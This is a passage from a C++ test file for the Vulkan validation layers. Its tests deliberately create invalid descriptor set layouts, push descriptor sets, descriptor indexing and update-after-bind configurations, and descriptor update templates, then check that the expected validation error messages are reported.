= 0; dsl_binding[1].descriptorCount = 1; dsl_binding[1].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[1].descriptorCount = 1; dsl_binding[1].stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dsl_binding[1].pImmutableSamplers = NULL; dsl_binding[2].binding = 1; // Duplicate binding should cause error dsl_binding[2].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[2].descriptorCount = 1; dsl_binding[2].stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dsl_binding[2].pImmutableSamplers = NULL; VkDescriptorSetLayoutCreateInfo ds_layout_ci = {}; ds_layout_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO; ds_layout_ci.pNext = NULL; ds_layout_ci.bindingCount = NUM_BINDINGS; ds_layout_ci.pBindings = dsl_binding; VkDescriptorSetLayout ds_layout; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutCreateInfo-binding-00279"); vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidPushDescriptorSetLayout) { TEST_DESCRIPTION("Create a push descriptor set layout with invalid bindings."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Did not find VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME; skipped.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); return; } 
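    // Push descriptors are available; the rest of the test exercises the create-time restrictions on push descriptor set layouts.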
    ASSERT_NO_FATAL_FAILURE(InitState());

    // Get the push descriptor limits
    auto push_descriptor_prop = GetPushDescriptorProperties(instance(), gpu());
    if (push_descriptor_prop.maxPushDescriptors < 1) {
        // Some implementations report an invalid maxPushDescriptors of 0
        printf("%s maxPushDescriptors is zero, skipping tests\n", kSkipPrefix);
        return;
    }

    VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr};
    auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>();
    ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR;
    ds_layout_ci.bindingCount = 1;
    ds_layout_ci.pBindings = &binding;

    // Note that as binding is referenced in ds_layout_ci, it is effectively in the closure by reference as well.
    auto test_create_ds_layout = [&ds_layout_ci, this](std::string error) {
        VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE;
        m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error);
        vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout);
        m_errorMonitor->VerifyFound();
        vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr);
    };

    // Starting with the initial VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC type set above.
    test_create_ds_layout("VUID-VkDescriptorSetLayoutCreateInfo-flags-00280");
    binding.descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER_DYNAMIC;
    test_create_ds_layout(
        "VUID-VkDescriptorSetLayoutCreateInfo-flags-00280");  // This is the same VUID as above, just a second error condition.

    if (!(push_descriptor_prop.maxPushDescriptors == std::numeric_limits<uint32_t>::max())) {
        binding.descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER;
        binding.descriptorCount = push_descriptor_prop.maxPushDescriptors + 1;
        test_create_ds_layout("VUID-VkDescriptorSetLayoutCreateInfo-flags-00281");
    } else {
        printf("%s maxPushDescriptors is set to maximum uint32_t value, skipping 'out of range test'.\n", kSkipPrefix);
    }
}

TEST_F(VkLayerTest, PushDescriptorSetLayoutWithoutExtension) {
    TEST_DESCRIPTION("Create a push descriptor set layout without loading the needed extension.");
    ASSERT_NO_FATAL_FAILURE(Init());

    VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr};
    auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>();
    ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR;
    ds_layout_ci.bindingCount = 1;
    ds_layout_ci.pBindings = &binding;

    std::string error = "Attempted to use VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR in ";
    error = error + "VkDescriptorSetLayoutCreateInfo::flags but its required extension ";
    error = error + VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME;
    error = error + " has not been enabled.";

    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error.c_str());
    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutCreateInfo-flags-00281");
    VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE;
    vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout);
    m_errorMonitor->VerifyFound();
    vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr);
}

TEST_F(VkLayerTest, DescriptorIndexingSetLayoutWithoutExtension) {
    TEST_DESCRIPTION("Create an update_after_bind set layout without loading the needed extension.");
    ASSERT_NO_FATAL_FAILURE(Init());

    auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>();
    ds_layout_ci.flags =
VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; std::string error = "Attemped to use VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT in "; error = error + "VkDescriptorSetLayoutCreateInfo::flags but its required extension "; error = error + VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME; error = error + " has not been enabled."; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error.c_str()); VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); } TEST_F(VkLayerTest, DescriptorIndexingSetLayout) { TEST_DESCRIPTION("Exercise various create/allocate-time errors related to VK_EXT_descriptor_indexing."); if (!(CheckDescriptorIndexingSupportAndInitFramework(this, m_instance_extension_names, m_device_extension_names, NULL, m_errorMonitor))) { printf("%s Descriptor indexing or one of its dependencies not supported, skipping tests\n.", kSkipPrefix); return; } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); // Create a device that enables all supported indexing features except descriptorBindingUniformBufferUpdateAfterBind auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); indexing_features.descriptorBindingUniformBufferUpdateAfterBind = VK_FALSE; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2)); std::array<VkDescriptorBindingFlagsEXT, 2> flags = {VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT, VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT}; auto flags_create_info = lvl_init_struct<VkDescriptorSetLayoutBindingFlagsCreateInfoEXT>(); flags_create_info.bindingCount = (uint32_t)flags.size(); flags_create_info.pBindingFlags = flags.data(); VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(&flags_create_info); ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &binding; VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; // VU for VkDescriptorSetLayoutBindingFlagsCreateInfoEXT::bindingCount flags_create_info.bindingCount = 2; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBindingFlagsCreateInfo-bindingCount-03002"); VkResult err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); flags_create_info.bindingCount = 1; // set is missing UPDATE_AFTER_BIND_POOL flag. 
m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutCreateInfo-flags-03000"); // binding uses a feature we disabled m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBindingFlagsCreateInfo-descriptorBindingUniformBufferUpdateAfterBind-03005"); err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; ds_layout_ci.bindingCount = 0; flags_create_info.bindingCount = 0; err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); ASSERT_VK_SUCCESS(err); VkDescriptorPoolSize pool_size = {binding.descriptorType, binding.descriptorCount}; auto dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.poolSizeCount = 1; dspci.pPoolSizes = &pool_size; dspci.maxSets = 1; VkDescriptorPool pool; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; VkDescriptorSet ds = VK_NULL_HANDLE; // mismatch between descriptor set and pool m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-pSetLayouts-03044"); vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); if (indexing_features.descriptorBindingVariableDescriptorCount) { ds_layout_ci.flags = 0; ds_layout_ci.bindingCount = 1; flags_create_info.bindingCount = 1; flags[0] = VK_DESCRIPTOR_BINDING_VARIABLE_DESCRIPTOR_COUNT_BIT_EXT; err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); ASSERT_VK_SUCCESS(err); pool_size = {binding.descriptorType, binding.descriptorCount}; dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.poolSizeCount = 1; dspci.pPoolSizes = &pool_size; dspci.maxSets = 1; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto count_alloc_info = lvl_init_struct<VkDescriptorSetVariableDescriptorCountAllocateInfoEXT>(); count_alloc_info.descriptorSetCount = 1; // Set variable count larger than what was in the descriptor binding uint32_t variable_count = 2; count_alloc_info.pDescriptorCounts = &variable_count; ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(&count_alloc_info); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; ds = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetVariableDescriptorCountAllocateInfo-pSetLayouts-03046"); vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); } } TEST_F(VkLayerTest, DescriptorIndexingUpdateAfterBind) { TEST_DESCRIPTION("Exercise errors for updating a descriptor set after it is bound."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { 
m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME) && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE3_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_MAINTENANCE3_EXTENSION_NAME); } else { printf("%s Descriptor Indexing or Maintenance3 Extension not supported, skipping tests\n", kSkipPrefix); return; } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); // Create a device that enables all supported indexing features except descriptorBindingUniformBufferUpdateAfterBind auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); indexing_features.descriptorBindingUniformBufferUpdateAfterBind = VK_FALSE; if (VK_FALSE == indexing_features.descriptorBindingStorageBufferUpdateAfterBind) { printf("%s Test requires (unsupported) descriptorBindingStorageBufferUpdateAfterBind, skipping\n", kSkipPrefix); return; } if (VK_FALSE == features2.features.fragmentStoresAndAtomics) { printf("%s Test requires (unsupported) fragmentStoresAndAtomics, skipping\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorBindingFlagsEXT flags[3] = {0, VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT, VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT}; auto flags_create_info = lvl_init_struct<VkDescriptorSetLayoutBindingFlagsCreateInfoEXT>(); flags_create_info.bindingCount = 3; flags_create_info.pBindingFlags = &flags[0]; // Descriptor set has two bindings - only the second is update_after_bind VkDescriptorSetLayoutBinding binding[3] = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, {2, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, }; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(&flags_create_info); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; ds_layout_ci.bindingCount = 3; ds_layout_ci.pBindings = &binding[0]; VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; VkResult err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); VkDescriptorPoolSize pool_sizes[3] = { {binding[0].descriptorType, binding[0].descriptorCount}, {binding[1].descriptorType, binding[1].descriptorCount}, {binding[2].descriptorType, binding[2].descriptorCount}, }; auto dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.flags = VK_DESCRIPTOR_POOL_CREATE_UPDATE_AFTER_BIND_BIT_EXT; dspci.poolSizeCount = 3; dspci.pPoolSizes = &pool_sizes[0]; dspci.maxSets = 1; VkDescriptorPool pool; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, 
nullptr, &pool); ASSERT_VK_SUCCESS(err); auto ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; VkDescriptorSet ds = VK_NULL_HANDLE; vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); ASSERT_VK_SUCCESS(err); VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT | VK_BUFFER_USAGE_STORAGE_BUFFER_BIT; VkBuffer dynamic_uniform_buffer; err = vk::CreateBuffer(m_device->device(), &buffCI, NULL, &dynamic_uniform_buffer); ASSERT_VK_SUCCESS(err); VkDeviceMemory mem; VkMemoryRequirements mem_reqs; vk::GetBufferMemoryRequirements(m_device->device(), dynamic_uniform_buffer, &mem_reqs); VkMemoryAllocateInfo mem_alloc_info = {}; mem_alloc_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; mem_alloc_info.allocationSize = mem_reqs.size; m_device->phy().set_memory_type(mem_reqs.memoryTypeBits, &mem_alloc_info, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT); err = vk::AllocateMemory(m_device->device(), &mem_alloc_info, NULL, &mem); ASSERT_VK_SUCCESS(err); err = vk::BindBufferMemory(m_device->device(), dynamic_uniform_buffer, mem, 0); ASSERT_VK_SUCCESS(err); VkDescriptorBufferInfo buffInfo[2] = {}; buffInfo[0].buffer = dynamic_uniform_buffer; buffInfo[0].offset = 0; buffInfo[0].range = 1024; VkWriteDescriptorSet descriptor_write[2] = {}; descriptor_write[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write[0].dstSet = ds; descriptor_write[0].dstBinding = 0; descriptor_write[0].descriptorCount = 1; descriptor_write[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write[0].pBufferInfo = buffInfo; descriptor_write[1] = descriptor_write[0]; descriptor_write[1].dstBinding = 1; descriptor_write[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; VkPipelineLayout pipeline_layout; VkPipelineLayoutCreateInfo pipeline_layout_ci = {}; pipeline_layout_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_LAYOUT_CREATE_INFO; pipeline_layout_ci.setLayoutCount = 1; pipeline_layout_ci.pSetLayouts = &ds_layout; vk::CreatePipelineLayout(m_device->device(), &pipeline_layout_ci, NULL, &pipeline_layout); // Create a dummy pipeline, since VL inspects which bindings are actually used at draw time char const *fsSource = "#version 450\n" "\n" "layout(location=0) out vec4 color;\n" "layout(set=0, binding=0) uniform foo0 { float x0; } bar0;\n" "layout(set=0, binding=1) buffer foo1 { float x1; } bar1;\n" "layout(set=0, binding=2) buffer foo2 { float x2; } bar2;\n" "void main(){\n" " color = vec4(bar0.x0 + bar1.x1 + bar2.x2);\n" "}\n"; VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.SetViewport(m_viewports); pipe.SetScissor(m_scissors); pipe.AddDefaultColorAttachment(); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.CreateVKPipeline(pipeline_layout, m_renderPass); // Make both bindings valid before binding to the command buffer vk::UpdateDescriptorSets(m_device->device(), 2, &descriptor_write[0], 0, NULL); m_errorMonitor->VerifyNotFound(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); // Two subtests. First only updates the update_after_bind binding and expects // no error. 
Second updates the other binding and expects an error when the // command buffer is ended. for (uint32_t i = 0; i < 2; ++i) { m_commandBuffer->begin(); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout, 0, 1, &ds, 0, NULL); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdDraw(m_commandBuffer->handle(), 0, 0, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_errorMonitor->VerifyNotFound(); // Valid to update binding 1 after being bound vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write[1], 0, NULL); m_errorMonitor->VerifyNotFound(); if (i == 0) { // expect no errors m_commandBuffer->end(); m_errorMonitor->VerifyNotFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-DescriptorSetNotUpdated"); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); vk::QueueWaitIdle(m_device->m_queue); } else { // Invalid to update binding 0 after being bound. But the error is actually // generated during vk::EndCommandBuffer vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write[0], 0, NULL); m_errorMonitor->VerifyNotFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkDescriptorSet"); vk::EndCommandBuffer(m_commandBuffer->handle()); m_errorMonitor->VerifyFound(); } } vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); vk::DestroyBuffer(m_device->handle(), dynamic_uniform_buffer, NULL); vk::FreeMemory(m_device->handle(), mem, NULL); vk::DestroyPipelineLayout(m_device->handle(), pipeline_layout, NULL); } TEST_F(VkLayerTest, AllocatePushDescriptorSet) { TEST_DESCRIPTION("Attempt to allocate a push descriptor set."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); auto push_descriptor_prop = GetPushDescriptorProperties(instance(), gpu()); if (push_descriptor_prop.maxPushDescriptors < 1) { // Some implementations report an invalid maxPushDescriptors of 0 printf("%s maxPushDescriptors is zero, skipping tests\n", kSkipPrefix); return; } VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR; ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &binding; VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; VkResult err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); ASSERT_VK_SUCCESS(err); VkDescriptorPoolSize pool_size = 
{binding.descriptorType, binding.descriptorCount}; auto dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.poolSizeCount = 1; dspci.pPoolSizes = &pool_size; dspci.maxSets = 1; VkDescriptorPool pool; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; VkDescriptorSet ds = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-pSetLayouts-00308"); vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); } TEST_F(VkLayerTest, CreateDescriptorUpdateTemplate) { TEST_DESCRIPTION("Verify error messages for invalid vkCreateDescriptorUpdateTemplate calls."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Did not find VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME; skipped.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); // Note: Includes workaround for some implementations which incorrectly return 0 maxPushDescriptors if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME) && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME) && (GetPushDescriptorProperties(instance(), gpu()).maxPushDescriptors > 0)) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME); } else { printf("%s Push Descriptors and Descriptor Update Template Extensions not supported, skipping tests\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout_ub(m_device, {dsl_binding}); const VkDescriptorSetLayoutObj ds_layout_ub1(m_device, {dsl_binding}); const VkDescriptorSetLayoutObj ds_layout_ub_push(m_device, {dsl_binding}, VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR); const VkPipelineLayoutObj pipeline_layout(m_device, {{&ds_layout_ub, &ds_layout_ub1, &ds_layout_ub_push}}); PFN_vkCreateDescriptorUpdateTemplateKHR vkCreateDescriptorUpdateTemplateKHR = (PFN_vkCreateDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkCreateDescriptorUpdateTemplateKHR"); ASSERT_NE(vkCreateDescriptorUpdateTemplateKHR, nullptr); PFN_vkDestroyDescriptorUpdateTemplateKHR vkDestroyDescriptorUpdateTemplateKHR = (PFN_vkDestroyDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkDestroyDescriptorUpdateTemplateKHR"); ASSERT_NE(vkDestroyDescriptorUpdateTemplateKHR, nullptr); uint64_t badhandle = 0xcadecade; VkDescriptorUpdateTemplateEntry entries = {0, 0, 1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, sizeof(VkBuffer)}; VkDescriptorUpdateTemplateCreateInfo create_info = {}; create_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_UPDATE_TEMPLATE_CREATE_INFO; 
